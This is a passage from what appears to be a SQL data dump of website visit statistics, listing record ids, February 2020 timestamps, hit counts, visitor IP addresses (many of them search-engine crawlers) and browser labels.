4.26','chrome'),(479363,1581146134,3,3,0,0,'37.17.172.154','other'),(479364,1581146173,3,3,0,0,'37.17.172.155','other'),(479365,1581146224,3,3,0,0,'37.17.172.157','other'),(479366,1581146264,3,3,0,0,'37.17.172.158','other'),(479367,1581146318,3,3,0,0,'37.17.172.148','other'),(479368,1581146359,3,3,0,0,'37.17.172.149','other'),(479369,1581146397,3,3,0,0,'37.17.172.150','other'),(479370,1581146442,3,3,0,0,'37.17.172.151','other'),(479371,1581146481,3,3,0,0,'37.17.172.152','other'),(479372,1581146530,3,3,0,0,'37.17.172.153','other'),(479373,1581146940,2,2,0,0,'66.249.64.27','chrome'),(479374,1581146952,1,1,0,0,'209.17.97.18','other'),(479375,1581146953,1,1,0,0,'66.249.70.62','chrome'),(479376,1581147340,1,1,0,0,'209.17.96.50','other'),(479377,1581147433,1,1,0,0,'37.17.172.154','other'),(479378,1581147478,1,1,0,0,'37.17.172.155','other'),(479379,1581148775,1,1,0,0,'8.29.198.27','other'),(479380,1581148881,1,1,0,0,'8.29.198.25','other'),(479381,1581148922,1,1,0,0,'66.249.64.28','chrome'),(479382,1581150266,1,1,0,0,'5.255.253.8','other'),(479383,1581150404,3,3,0,0,'157.55.39.92','other'),(479384,1581150608,1,1,0,0,'207.46.13.136','other'),(479385,1581152162,1,1,0,0,'37.9.113.177','other'),(479386,1581152164,1,1,0,0,'141.8.183.53','other'),(479387,1581152230,2,2,0,0,'157.55.39.53','other'),(479388,1581154053,1,1,0,0,'157.55.39.92','other'),(479389,1581155337,1,1,0,0,'31.13.127.20','other'),(479390,1581155339,2,2,0,0,'31.13.127.9','other'),(479392,1581156925,1,1,0,0,'157.55.39.92','other'),(479393,1581158143,1,0,1,0,'157.55.39.53',''),(479394,1581158492,1,1,0,0,'37.9.113.163','other'),(479395,1581159731,2,2,0,0,'8.29.198.25','other'),(479396,1581160340,1,1,0,0,'157.55.39.92','other'),(479397,1581161353,17,17,0,0,'157.245.12.129','firefox'),(479398,1581161480,1,1,0,0,'109.74.154.72','chrome'),(479399,1581163945,38,38,0,0,'34.66.64.45','firefox'),(479400,1581163951,2,2,0,0,'34.66.64.45','other'),(479401,1581164282,1,1,0,0,'157.55.39.92','other'),(479402,1581164463,1,0,1,0,'207.46.13.50',''),(479403,1581166800,1,1,0,0,'38.99.62.94','other'),(479404,1581167282,1,1,0,0,'157.55.39.92','other'),(479405,1581167452,1,1,0,0,'66.249.64.26','chrome'),(479406,1581167501,1,1,0,0,'141.8.142.119','other'),(479407,1581167950,1,1,0,0,'38.99.62.88','other'),(479408,1581168584,1,1,0,0,'207.46.13.203','other'),(479409,1581168795,39,39,0,0,'34.66.64.45','firefox'),(479410,1581168800,2,2,0,0,'34.66.64.45','other'),(479411,1581170665,1,1,0,0,'8.29.198.26','other'),(479412,1581170760,1,1,0,0,'8.29.198.25','other'),(479413,1581170765,1,1,0,0,'94.130.9.183','other'),(479414,1581171207,1,1,0,0,'157.55.39.92','other'),(479415,1581172015,1,1,0,0,'91.232.158.77','chrome'),(479416,1581173439,1,0,1,0,'157.55.39.53',''),(479417,1581173621,2,2,0,0,'46.201.67.144','chrome'),(479418,1581173740,1,1,0,0,'157.55.39.92','other'),(479419,1581174545,1,1,0,0,'157.55.39.53','other'),(479420,1581174816,1,1,0,0,'178.154.171.66','other'),(479421,1581175041,1,1,0,0,'141.8.183.100','other'),(479422,1581175594,2,2,0,0,'157.55.39.92','other'),(479423,1581176239,3,3,0,0,'104.155.181.250','chrome'),(479424,1581176323,3,3,0,0,'34.66.173.205','chrome'),(479425,1581176346,5,5,0,0,'146.148.95.194','chrome'),(479426,1581176370,3,3,0,0,'35.225.58.110','chrome'),(479427,1581176380,2,2,0,0,'35.222.57.86','chrome'),(479429,1581176413,1,1,0,0,'207.46.13.203','other'),(479430,1581176637,1,1,0,0,'157.55.39.92','other'),(479431,1581176711,1,1,0,0,'91.196.178.184','chrome'),(479432,1581177582,1,0,1,0,'157.55.39.92',''),(479433,1581177807,2,2,0,0,'66.249.64.28','chrome'),(479434,1581178037,1,1,0,0,'194.247.173.1','chrome'),(479435,1581178186,1,1,0,0,'66.249.64.27','chrome'),(479436,1581178221,1,1,0,0,'157.55.39.92','other'),(479437,1581178365,1,1,0,0,'157.55.39.53','other'),(479438,1581178635,2,2,0,0,'66.249.64.26','chrome'),(479439,1581178778,1,1,0,0,'66.249.70.33','chrome'),(479440,1581179029,1,1,0,0,'207.46.13.203','other'),(479441,1581179054,3,3,0,0,'66.249.64.28','chrome'),(479442,1581179280,2,2,0,0,'66.249.64.27','chrome'),(479443,1581179328,2,1,1,0,'157.55.39.92',''),(479444,1581179390,1,1,0,0,'161.0.6.220','chrome'),(479445,1581179850,1,1,0,0,'66.249.70.33','chrome'),(479446,1581179866,3,3,0,0,'66.249.64.26','chrome'),(479447,1581180783,1,1,0,0,'66.249.70.33','chrome'),(479448,1581181340,1,1,0,0,'66.249.64.26','chrome'),(479449,1581181568,1,1,0,0,'141.8.142.2','other'),(479450,1581181600,1,1,0,0,'8.29.198.25','other'),(479451,1581181644,1,1,0,0,'184.94.240.92','firefox'),(479452,1581181697,1,1,0,0,'8.29.198.26','other'),(479453,1581182689,1,0,1,0,'157.55.39.92',''),(479454,1581183151,1,1,0,0,'207.46.13.203','other'),(479455,1581183311,1,1,0,0,'141.8.142.2','other'),(479456,1581183350,1,0,1,0,'157.55.39.53',''),(479457,1581183794,1,1,0,0,'157.55.39.53','other'),(479458,1581184035,1,0,1,0,'157.55.39.92',''),(479459,1581184350,1,1,0,0,'157.55.39.92','other'),(479460,1581184408,1,1,0,0,'207.46.13.203','other'),(479461,1581184645,1,1,0,0,'37.9.113.142','other'),(479462,1581185023,1,1,0,0,'88.154.249.248','chrome'),(479463,1581187971,1,1,0,0,'157.55.39.53','other'),(479464,1581188141,2,2,0,0,'207.46.13.203','other'),(479465,1581188282,1,1,0,0,'157.55.39.92','other'),(479466,1581189850,1,1,0,0,'178.154.171.134','other'),(479467,1581190273,1,1,0,0,'66.249.64.27','chrome'),(479468,1581191371,1,1,0,0,'141.8.142.132','other'),(479469,1581191435,1,1,0,0,'207.46.13.203','other'),(479470,1581192041,1,1,0,0,'157.55.39.53','other'),(479471,1581192521,2,2,0,0,'8.29.198.26','other'),(479472,1581192599,1,0,1,0,'207.46.13.203',''),(479473,1581193980,2,2,0,0,'157.55.39.53','other'),(479474,1581195638,1,1,0,0,'141.8.188.38','other'),(479475,1581195869,3,3,0,0,'157.55.39.53','other'),(479476,1581197011,1,1,0,0,'176.117.174.188','chrome'),(479477,1581197781,1,0,1,0,'207.46.13.203',''),(479478,1581197882,1,1,0,0,'95.108.213.61','other'),(479479,1581198182,1,1,0,0,'188.116.151.100','firefox'),(479481,1581198288,2,2,0,0,'207.46.13.203','other'),(479482,1581198535,1,0,1,0,'157.55.39.53',''),(479483,1581199530,1,1,0,0,'66.249.64.28','chrome'),(479484,1581199781,1,1,0,0,'141.8.142.50','other'),(479485,1581200570,2,2,0,0,'157.55.39.53','other'),(479486,1581201874,1,1,0,0,'66.249.70.36','chrome'),(479487,1581201881,1,1,0,0,'66.249.70.33','chrome'),(479488,1581202998,1,1,0,0,'141.8.188.39','other'),(479489,1581203123,1,1,0,0,'157.55.39.53','other'),(479490,1581203443,2,2,0,0,'8.29.198.27','other'),(479491,1581203573,1,1,0,0,'141.8.132.9','other'),(479492,1581204514,1,1,0,0,'157.55.39.53','other'),(479493,1581204625,1,1,0,0,'141.8.188.18','other'),(479494,1581204649,1,1,0,0,'5.180.136.33','chrome'),(479495,1581205128,1,1,0,0,'141.8.188.20','other'),(479496,1581206474,1,1,0,0,'141.8.188.39','other'),(479497,1581206509,1,1,0,0,'18.188.114.42','chrome'),(479498,1581206856,1,1,0,0,'141.8.132.31','other'),(479499,1581207839,1,1,0,0,'87.250.224.104','other'),(479500,1581208081,2,2,0,0,'207.46.13.203','other'),(479501,1581208089,1,1,0,0,'66.249.64.28','chrome'),(479502,1581209700,1,1,0,0,'66.249.70.33','chrome'),(479503,1581209718,1,1,0,0,'62.205.134.182','other'),(479504,1581210361,1,1,0,0,'178.154.171.7','other'),(479505,1581211461,1,1,0,0,'5.45.207.65','other'),(479506,1581211601,1,1,0,0,'141.8.142.128','other'),(479507,1581212757,1,1,0,0,'66.249.64.28','chrome'),(479508,1581213343,1,0,1,0,'207.46.13.203',''),(479509,1581214366,1,1,0,0,'8.29.198.26','other'),(479510,1581214471,1,1,0,0,'8.29.198.27','other'),(479511,1581214512,1,1,0,0,'207.46.13.203','other'),(479512,1581214922,1,1,0,0,'66.249.70.36','chrome'),(479513,1581216322,1,1,0,0,'37.9.113.200','other'),(479514,1581218105,1,1,0,0,'157.55.39.53','other'),(479515,1581218140,2,2,0,0,'207.46.13.203','other'),(479516,1581219105,1,1,0,0,'157.55.39.53','other'),(479517,1581219242,1,1,0,0,'66.249.70.36','chrome'),(479518,1581219247,1,1,0,0,'66.249.70.33','chrome'),(479519,1581219519,1,1,0,0,'141.8.132.28','other'),(479520,1581220316,1,1,0,0,'193.106.30.99','firefox'),(479521,1581221417,1,1,0,0,'54.201.65.197','chrome'),(479522,1581221421,1,1,0,0,'35.162.70.167','other'),(479523,1581222188,8,8,0,0,'207.46.13.203','other'),(479524,1581222558,4,4,0,0,'157.55.39.53','other'),(479525,1581224389,1,0,1,0,'157.55.39.53',''),(479526,1581224612,1,1,0,0,'157.55.39.53','other'),(479527,1581224977,1,1,0,0,'37.9.113.200','other'),(479528,1581225267,2,2,0,0,'8.29.198.27','other'),(479529,1581225909,1,1,0,0,'37.9.113.200','other'),(479530,1581226660,1,1,0,0,'141.8.132.9','other'),(479531,1581227005,1,1,0,0,'62.205.134.182','other'),(479532,1581227061,1,1,0,0,'157.55.39.53','other'),(479533,1581227549,1,1,0,0,'141.8.188.39','other'),(479534,1581228548,1,1,0,0,'141.8.183.67','other'),(479535,1581229289,2,2,0,0,'207.46.13.203','other'),(479536,1581229800,1,1,0,0,'5.255.253.8','other'),(479537,1581231973,1,1,0,0,'141.8.183.67','other'),(479538,1581232190,2,2,0,0,'157.55.39.53','other'),(479539,1581233905,1,1,0,0,'207.46.13.203','other'),(479540,1581234203,1,1,0,0,'37.9.113.142','other'),(479541,1581234209,1,1,0,0,'87.250.224.104','other'),(479542,1581234997,1,1,0,0,'141.8.188.20','other'),(479543,1581235063,1,1,0,0,'141.8.188.38','other'),(479544,1581236199,1,1,0,0,'8.29.198.25','other'),(479545,1581236274,1,1,0,0,'207.46.13.203','other'),(479546,1581236322,1,1,0,0,'8.29.198.27','other'),(479547,1581236361,1,1,0,0,'91.196.178.93','chrome'),(479548,1581236497,1,1,0,0,'157.55.39.53','other'),(479549,1581236539,1,1,0,0,'178.154.171.7','other'),(479550,1581236733,1,1,0,0,'87.250.224.104','other'),(479551,1581238200,2,2,0,0,'37.9.113.97','other'),(479552,1581238519,1,1,0,0,'157.55.39.53','other'),(479553,1581240108,1,1,0,0,'78.190.105.170','chrome'),(479554,1581240947,1,1,0,0,'141.8.142.164','other'),(479555,1581241620,1,1,0,0,'37.9.113.142','other'),(479556,1581242093,1,1,0,0,'157.55.39.53','other'),(479557,1581242440,1,1,0,0,'37.9.113.97','other'),(479558,1581242984,1,0,1,0,'207.46.13.203',''),(479559,1581243931,1,1,0,0,'46.211.158.159','chrome'),(479560,1581244143,1,1,0,0,'141.8.142.2','other'),(479561,1581244464,1,1,0,0,'207.46.13.203','other'),(479562,1581244547,1,1,0,0,'141.8.188.39','other'),(479563,1581245296,1,1,0,0,'91.196.178.182','chrome'),(479564,1581245712,2,2,0,0,'157.55.39.53','other'),(479565,1581245741,1,1,0,0,'207.46.13.203','other'),(479566,1581245862,1,0,1,0,'66.249.64.26',''),(479567,1581247112,1,1,0,0,'8.29.198.27','other'),(479568,1581247248,1,1,0,0,'8.29.198.26','other'),(479569,1581247954,1,1,0,0,'109.74.154.72','chrome'),(479570,1581248319,1,1,0,0,'87.250.224.104','other'),(479571,1581248597,1,1,0,0,'138.246.253.5','chrome'),(479572,1581250000,1,1,0,0,'66.249.64.27','chrome'),(479573,1581250996,1,1,0,0,'207.46.13.203','other'),(479574,1581251399,3,2,1,0,'157.55.39.53',''),(479575,1581251487,1,1,0,0,'87.250.224.104','other'),(479576,1581252068,1,1,0,0,'157.55.39.53','other'),(479577,1581252081,1,1,0,0,'66.249.70.36','chrome'),(479578,1581253257,1,0,1,0,'207.46.13.203',''),(479579,1581255283,2,2,0,0,'207.46.13.203','other'),(479580,1581255385,1,1,0,0,'157.55.39.53','other'),(479581,1581256501,1,1,0,0,'91.196.178.138','chrome'),(479582,1581258020,1,1,0,0,'8.29.198.25','other'),(479583,1581258650,1,1,0,0,'8.29.198.27','other'),(479584,1581259094,1,0,1,0,'157.55.39.53',''),(479585,1581259730,1,0,1,0,'207.46.13.203',''),(479586,1581259951,1,1,0,0,'141.8.183.18','other'),(479587,1581261917,1,1,0,0,'157.55.39.53','other'),(479588,1581263671,1,1,0,0,'141.8.188.18','other'),(479589,1581265326,1,1,0,0,'51.68.152.26','chrome'),(479590,1581265328,1,1,0,0,'46.211.136.93','chrome'),(479591,1581265388,1,1,0,0,'207.46.13.203','other'),(479592,1581265463,1,1,0,0,'91.196.178.100','chrome'),(479593,1581265754,1,1,0,0,'141.8.188.39','other'),(479594,1581266479,1,1,0,0,'157.55.39.53','other'),(479595,1581266830,1,1,0,0,'87.250.224.104','other'),(479596,1581267473,2,1,1,0,'157.55.39.53',''),(479597,1581267773,1,1,0,0,'178.154.171.7','other'),(479598,1581267780,1,1,0,0,'66.249.70.62','chrome'),(479599,1581267834,1,1,0,0,'66.249.64.26','chrome'),(479600,1581267858,2,2,0,0,'31.135.131.149','firefox'),(479601,1581268091,1,1,0,0,'185.15.56.22','other'),(479602,1581268104,1,1,0,0,'157.55.39.53','other'),(479603,1581268926,2,2,0,0,'8.29.198.27','other'),(479604,1581270304,1,1,0,0,'5.255.253.8','other'),(479605,1581270979,1,1,0,0,'66.249.64.28','chrome'),(479606,1581270980,2,2,0,0,'66.249.64.26','chrome'),(479607,1581271492,2,2,0,0,'66.249.64.27','chrome'),(479608,1581271579,1,1,0,0,'157.55.39.53','other'),(479609,1581272650,2,2,0,0,'66.249.64.28','chrome'),(479610,1581272801,1,1,0,0,'95.108.213.3','other'),(479611,1581273182,1,1,0,0,'66.249.70.36','chrome'),(479612,1581273247,1,1,0,0,'66.249.64.26','chrome'),(479613,1581273653,1,1,0,0,'95.55.1.168','chrome'),(479614,1581273679,1,1,0,0,'37.9.113.97','other'),(479615,1581273803,1,1,0,0,'66.249.64.27','chrome'),(479616,1581274605,1,1,0,0,'157.55.39.53','other'),(479617,1581274811,1,1,0,0,'141.8.142.164','other'),(479618,1581275049,2,1,1,0,'66.249.64.27',''),(479619,1581275367,3,3,0,0,'66.249.64.27','chrome'),(479620,1581275539,1,1,0,0,'5.255.253.8','other'),(479621,1581275733,1,1,0,0,'173.252.111.12','other'),(479622,1581275734,1,1,0,0,'173.252.111.14','other'),(479625,1581275835,1,1,0,0,'141.8.132.9','other'),(479626,1581275936,1,1,0,0,'66.249.64.26','chrome'),(479627,1581276681,1,1,0,0,'157.55.39.53','other'),(479628,1581276699,1,1,0,0,'207.46.13.203','other'),(479629,1581276754,1,1,0,0,'66.249.64.27','chrome'),(479630,1581277000,1,1,0,0,'87.250.224.104','other'),(479631,1581277099,2,2,0,0,'66.249.64.26','chrome'),(479632,1581277110,1,1,0,0,'173.252.111.14','other'),(479633,1581277111,1,1,0,0,'173.252.111.22','other'),(479634,1581277143,1,1,0,0,'141.8.142.128','other'),(479635,1581277794,1,1,0,0,'141.8.188.20','other'),(479636,1581277798,1,1,0,0,'141.8.142.161','other'),(479637,1581277899,1,1,0,0,'141.8.183.67','other'),(479638,1581277902,1,1,0,0,'141.8.183.33','other'),(479639,1581278298,1,1,0,0,'141.8.188.39','other'),(479640,1581278614,1,1,0,0,'66.249.64.27','chrome'),(479641,1581278685,1,1,0,0,'66.249.64.26','chrome'),(479642,1581279259,1,1,0,0,'37.9.113.33','other'),(479643,1581279601,1,1,0,0,'66.249.64.26','chrome'),(479644,1581279755,3,3,0,0,'66.249.64.28','chrome'),(479645,1581279879,1,1,0,0,'8.29.198.27','other'),(479646,1581279999,1,1,0,0,'66.249.70.62','chrome'),(479647,1581280095,2,1,1,0,'207.46.13.203',''),(479648,1581280479,1,1,0,0,'8.29.198.26','other'),(479649,1581280834,1,1,0,0,'66.249.64.28','chrome'),(479650,1581280996,1,1,0,0,'66.249.64.27','chrome'),(479651,1581281331,1,1,0,0,'157.55.39.53','other'),(479652,1581281410,2,2,0,0,'141.8.188.66','other'),(479653,1581281647,1,1,0,0,'141.8.188.20','other'),(479654,1581281803,1,1,0,0,'66.249.64.26','chrome'),(479655,1581281848,1,1,0,0,'66.249.64.28','chrome'),(479656,1581281976,1,1,0,0,'95.108.181.103','other'),(479657,1581282589,1,1,0,0,'141.8.142.164','other'),(479658,1581284230,2,2,0,0,'207.46.13.203','other'),(479659,1581284336,1,1,0,0,'66.249.64.27','chrome'),(479660,1581284861,2,2,0,0,'66.249.64.26','chrome'),(479661,1581285148,1,1,0,0,'66.249.64.28','chrome'),(479662,1581285460,1,0,1,0,'157.55.39.53',''),(479663,1581285652,2,2,0,0,'66.249.64.27','chrome'),(479664,1581285972,1,1,0,0,'66.249.70.36','chrome'),(479665,1581286273,2,2,0,0,'157.55.39.53','other'),(479666,1581286765,1,1,0,0,'91.209.11.236','other'),(479667,1581286862,1,1,0,0,'37.9.113.177','other'),(479668,1581287123,1,1,0,0,'66.249.64.27','chrome'),(479669,1581287382,1,1,0,0,'141.8.183.67','other'),(479670,1581287626,1,1,0,0,'207.46.13.203','other'),(479671,1581288171,1,1,0,0,'66.249.64.27','chrome'),(479672,1581288433,1,1,0,0,'157.55.39.53','other'),(479673,1581288767,1,1,0,0,'207.46.13.203','other'),(479674,1581288788,1,1,0,0,'66.249.64.26','chrome'),(479675,1581289922,2,2,0,0,'66.249.64.28','chrome'),(479676,1581289989,4,4,0,0,'66.249.64.27','chrome'),(479677,1581290792,1,1,0,0,'8.29.198.25','other'),(479678,1581290952,1,0,1,0,'157.55.39.53',''),(479679,1581291115,1,1,0,0,'66.249.70.62','chrome'),(479680,1581291207,1,1,0,0,'95.108.213.55','other'),(479681,1581291404,1,1,0,0,'8.29.198.26','other'),(479682,1581291884,1,1,0,0,'141.8.188.39','other'),(479683,1581292992,2,2,0,0,'141.8.142.161','other'),(479684,1581292997,1,1,0,0,'141.8.183.100','other'),(479685,1581293106,3,3,0,0,'66.249.64.28','chrome'),(479686,1581293150,3,2,1,0,'66.249.64.26',''),(479687,1581293492,4,4,0,0,'66.249.64.27','chrome'),(479688,1581293940,2,2,0,0,'66.249.64.26','chrome'),(479689,1581294011,1,1,0,0,'66.249.70.36','chrome'),(479690,1581294426,1,1,0,0,'5.180.136.33','chrome'),(479691,1581294503,1,1,0,0,'141.8.132.28','other'),(479692,1581294869,6,0,6,0,'66.249.64.27',''),(479693,1581294880,5,0,5,0,'66.249.64.26',''),(479694,1581295431,1,1,0,0,'66.249.70.36','chrome'),(479695,1581295698,1,1,0,0,'66.249.70.33','chrome'),(479696,1581295707,1,1,0,0,'157.55.39.53','other'),(479697,1581295710,2,1,1,0,'66.249.64.26',''),(479698,1581295824,1,1,0,0,'78.46.85.236','other'),(479699,1581296114,1,1,0,0,'62.205.134.182','other'),(479700,1581296131,1,0,1,0,'66.249.64.28',''),(479701,1581296912,1,1,0,0,'37.9.113.142','other'),(479702,1581297474,2,2,0,0,'66.249.64.28','chrome'),(479703,1581297506,1,1,0,0,'95.216.2.253','other'),(479704,1581297532,1,1,0,0,'66.249.70.36','chrome'),(479705,1581298260,2,1,1,0,'66.249.64.27',''),(479706,1581298828,1,1,0,0,'141.8.142.164','other'),(479707,1581299282,1,1,0,0,'37.9.113.177','other'),(479708,1581299361,1,1,0,0,'66.249.64.26','chrome'),(479709,1581299677,1,1,0,0,'141.8.132.28','other'),(479710,1581299800,1,1,0,0,'66.249.64.28','chrome'),(479711,1581299970,1,1,0,0,'157.55.39.53','other'),(479712,1581300476,1,1,0,0,'66.249.64.26','chrome'),(479713,1581300662,1,1,0,0,'5.255.253.8','other'),(479714,1581300895,1,1,0,0,'66.249.64.27','chrome'),(479715,1581301126,1,1,0,0,'141.8.183.15','other'),(479716,1581301586,1,1,0,0,'66.249.64.28','chrome'),(479717,1581301614,1,1,0,0,'84.17.49.194','chrome'),(479718,1581301706,1,1,0,0,'8.29.198.26','other'),(479719,1581301820,1,1,0,0,'141.8.142.161','other'),(479720,1581302352,1,1,0,0,'8.29.198.27','other'),(479721,1581302690,3,3,0,0,'66.249.64.26','chrome'),(479722,1581302968,1,1,0,0,'66.249.64.28','chrome'),(479723,1581303242,1,1,0,0,'66.249.70.36','chrome'),(479724,1581303396,3,3,0,0,'66.249.64.27','chrome'),(479725,1581304018,1,1,0,0,'141.8.183.111','other'),(479726,1581304261,1,1,0,0,'207.46.13.203','other'),(479727,1581304871,2,2,0,0,'66.249.64.26','chrome'),(479728,1581305391,1,1,0,0,'178.154.171.127','other'),(479729,1581305653,1,1,0,0,'66.249.70.36','chrome'),(479730,1581305895,1,1,0,0,'141.8.132.28','other'),(479731,1581306077,1,1,0,0,'141.8.183.15','other'),(479732,1581306112,1,1,0,0,'37.9.113.163','other'),(479733,1581306637,1,1,0,0,'66.249.70.36','chrome'),(479734,1581307611,1,1,0,0,'178.154.171.7','other'),(479735,1581307813,1,1,0,0,'141.8.142.119','other'),(479736,1581308285,1,1,0,0,'34.221.227.170','chrome'),(479737,1581308289,1,1,0,0,'52.34.24.33','other'),(479738,1581308928,1,1,0,0,'37.9.113.163','other'),(479739,1581309166,2,2,0,0,'66.249.64.28','chrome'),(479740,1581309255,3,3,0,0,'66.249.64.26','chrome'),(479741,1581309981,1,1,0,0,'157.55.39.53','other'),(479742,1581310149,2,2,0,0,'66.249.64.28','chrome'),(479743,1581310545,1,1,0,0,'66.249.64.27','chrome'),(479744,1581310912,1,1,0,0,'178.154.171.66','other'),(479745,1581312677,2,2,0,0,'8.29.198.26','other'),(479746,1581312889,1,1,0,0,'66.249.64.28','chrome'),(479747,1581312940,1,1,0,0,'91.209.11.236','other'),(479748,1581313379,1,1,0,0,'178.154.171.134','other'),(479749,1581313521,1,1,0,0,'62.205.134.182','other'),(479750,1581313972,1,1,0,0,'66.249.64.26','chrome'),(479751,1581315170,1,1,0,0,'66.249.64.26','chrome'),(479752,1581315414,1,1,0,0,'66.249.70.36','chrome'),(479753,1581315592,1,1,0,0,'207.46.13.203','other'),(479754,1581315848,1,1,0,0,'66.249.70.62','chrome'),(479755,1581315972,1,1,0,0,'66.249.64.27','chrome'),(479756,1581316325,1,1,0,0,'91.196.178.76','chrome'),(479757,1581316915,1,1,0,0,'91.196.177.46','chrome'),(479758,1581317025,1,1,0,0,'66.249.64.27','chrome'),(479759,1581317636,14,14,0,0,'35.223.83.77','firefox'),(479760,1581317882,1,1,0,0,'178.154.171.134','other'),(479761,1581318131,1,1,0,0,'66.249.70.62','chrome'),(479762,1581318499,1,1,0,0,'66.249.64.28','chrome'),(479763,1581318534,1,1,0,0,'178.154.171.127','other'),(479764,1581318554,1,1,0,0,'46.211.134.246','chrome'),(479765,1581318595,1,1,0,0,'91.196.178.168','chrome'),(479766,1581319489,1,1,0,0,'37.9.113.10','other'),(479767,1581320128,1,1,0,0,'66.249.64.27','chrome'),(479768,1581320513,1,1,0,0,'178.154.171.134','other'),(479769,1581320545,1,0,1,0,'66.249.64.26',''),(479770,1581321179,2,2,0,0,'66.249.70.62','chrome'),(479771,1581321369,1,1,0,0,'91.196.178.76','chrome'),(479772,1581321517,1,1,0,0,'37.9.113.33','other'),(479773,1581322571,2,2,0,0,'66.249.64.28','chrome'),(479774,1581322935,1,1,0,0,'66.249.64.26','chrome'),(479775,1581323291,1,1,0,0,'178.154.171.66','other'),(479776,1581323417,1,1,0,0,'141.8.132.28','other'),(479777,1581323656,1,1,0,0,'8.29.198.26','other'),(479778,1581323834,2,2,0,0,'66.249.64.27','chrome'),(479779,1581323879,1,1,0,0,'207.46.13.168','other'),(479780,1581324245,1,1,0,0,'8.29.198.27','other'),(479781,1581324279,1,1,0,0,'37.9.113.200','other'),(479782,1581324886,3,3,0,0,'66.249.64.27','chrome'),(479783,1581325020,1,1,0,0,'66.249.70.33','chrome'),(479784,1581325255,1,1,0,0,'66.249.64.26','chrome'),(479785,1581325608,1,1,0,0,'66.249.64.28','chrome'),(479786,1581325660,1,1,0,0,'157.55.39.53','other'),(479787,1581326344,1,1,0,0,'91.196.178.76','chrome'),(479788,1581326440,1,1,0,0,'178.154.171.134','other'),(479789,1581327032,3,3,0,0,'66.249.64.27','chrome'),(479790,1581327638,1,1,0,0,'91.196.178.76','chrome'),(479791,1581327783,1,1,0,0,'178.154.171.134','other'),(479792,1581327878,2,2,0,0,'66.249.70.62','chrome'),(479793,1581327896,1,1,0,0,'66.249.64.26','chrome'),(479794,1581327934,1,1,0,0,'66.249.64.28','chrome'),(479795,1581327949,3,2,1,0,'66.249.64.27',''),(479796,1581328040,3,3,0,0,'207.46.13.168','other'),(479797,1581328273,1,1,0,0,'157.55.39.53','other'),(479798,1581328468,1,1,0,0,'46.219.207.56','chrome'),(479799,1581328963,2,2,0,0,'178.154.171.134','other'),(479800,1581329132,1,1,0,0,'91.196.178.168','chrome'),(479801,1581329222,3,3,0,0,'66.249.64.28','chrome'),(479802,1581330057,1,1,0,0,'91.196.178.168','chrome'),(479803,1581330143,2,2,0,0,'207.46.13.168','other'),(479804,1581330229,1,1,0,0,'18.221.226.94','chrome'),(479805,1581330330,2,1,1,0,'157.55.39.53',''),(479806,1581330535,1,1,0,0,'66.249.64.27','chrome'),(479807,1581331523,1,1,0,0,'66.249.64.26','chrome'),(479808,1581331660,1,1,0,0,'66.249.64.27','chrome'),(479809,1581331717,1,1,0,0,'157.55.39.53','other'),(479810,1581331843,1,1,0,0,'207.46.13.168','other'),(479811,1581331941,1,1,0,0,'66.249.64.28','chrome'),(479812,1581332356,1,1,0,0,'178.154.171.66','other'),(479813,1581332463,1,1,0,0,'5.45.207.65','other'),(479814,1581333507,1,1,0,0,'66.249.64.27','chrome'),(479815,1581333661,2,2,0,0,'207.46.13.203','other'),(479816,1581334311,2,2,0,0,'157.55.39.53','other'),(479817,1581334602,2,2,0,0,'8.29.198.27','other'),(479818,1581334638,1,1,0,0,'5.45.207.43','other'),(479819,1581334651,1,1,0,0,'66.249.64.28','chrome'),(479820,1581335572,1,1,0,0,'87.250.224.104','other'),(479821,1581335701,1,1,0,0,'109.74.154.72','chrome'),(479822,1581335839,1,1,0,0,'66.249.70.36','chrome'),(479823,1581335892,1,1,0,0,'66.249.64.27','chrome'),(479824,1581337022,1,1,0,0,'91.196.177.46','chrome'),(479825,1581337564,2,2,0,0,'207.46.13.203','other'),(479826,1581337980,1,1,0,0,'66.249.64.26','chrome'),(479827,1581338430,1,1,0,0,'91.196.178.168','chrome'),(479828,1581338541,2,1,1,0,'157.55.39.53',''),(479829,1581338866,1,1,0,0,'178.95.82.22','other'),(479830,1581339154,1,1,0,0,'66.249.70.62','chrome'),(479831,1581339234,1,1,0,0,'66.249.64.27','chrome'),(479832,1581339662,1,1,0,0,'91.196.177.46','chrome'),(479833,1581339950,1,1,0,0,'91.196.178.67','chrome'),(479834,1581340074,1,1,0,0,'185.41.248.190','chrome'),(479835,1581340738,1,1,0,0,'207.46.13.168','other'),(479836,1581340880,1,1,0,0,'91.196.178.67','chrome'),(479837,1581340913,2,2,0,0,'66.249.64.26','chrome'),(479838,1581341793,1,1,0,0,'89.113.197.198','other'),(479839,1581342135,1,1,0,0,'66.249.70.36','chrome'),(479840,1581342155,1,1,0,0,'13.66.139.0','other'),(479841,1581342434,2,1,1,0,'207.46.13.168',''),(479842,1581342585,1,1,0,0,'157.55.39.53','other'),(479843,1581342930,1,1,0,0,'37.53.90.175','chrome'),(479844,1581343074,4,4,0,0,'66.249.64.26','chrome'),(479845,1581343535,2,2,0,0,'66.249.64.28','chrome'),(479846,1581343917,1,1,0,0,'91.196.178.133','firefox'),(479847,1581344338,2,2,0,0,'66.249.64.27','chrome'),(479848,1581344395,1,1,0,0,'91.196.178.168','chrome'),(479849,1581344747,1,1,0,0,'91.196.178.76','chrome'),(479850,1581345080,1,1,0,0,'66.249.64.26','chrome'),(479851,1581345249,1,0,1,0,'207.46.13.168',''),(479852,1581345327,3,3,0,0,'66.249.64.28','chrome'),(479853,1581345438,2,2,0,0,'157.55.39.53','other'),(479854,1581345589,2,2,0,0,'8.29.198.27','other'),(479855,1581345598,1,1,0,0,'66.249.64.27','chrome'),(479856,1581345705,1,1,0,0,'66.249.70.62','chrome'),(479857,1581345793,1,1,0,0,'37.53.90.175','chrome'),(479858,1581346056,1,1,0,0,'207.46.13.168','other'),(479859,1581346138,1,1,0,0,'95.108.213.3','other'),(479860,1581346205,1,1,0,0,'91.196.178.76','chrome'),(479861,1581346236,1,1,0,0,'91.196.178.168','chrome'),(479862,1581346257,1,1,0,0,'66.249.64.26','chrome'),(479863,1581347123,2,2,0,0,'66.249.64.27','chrome'),(479864,1581347426,1,1,0,0,'141.8.183.33','other'),(479865,1581347460,1,1,0,0,'91.196.178.168','chrome'),(479866,1581347935,1,1,0,0,'141.8.142.119','other'),(479867,1581348333,3,3,0,0,'66.249.64.28','chrome'),(479868,1581348814,1,1,0,0,'212.90.160.70','chrome'),(479869,1581349131,2,2,0,0,'66.249.64.27','chrome'),(479870,1581349296,1,1,0,0,'31.13.127.12','other'),(479874,1581349392,2,2,0,0,'66.249.64.26','chrome'),(479875,1581349504,1,1,0,0,'14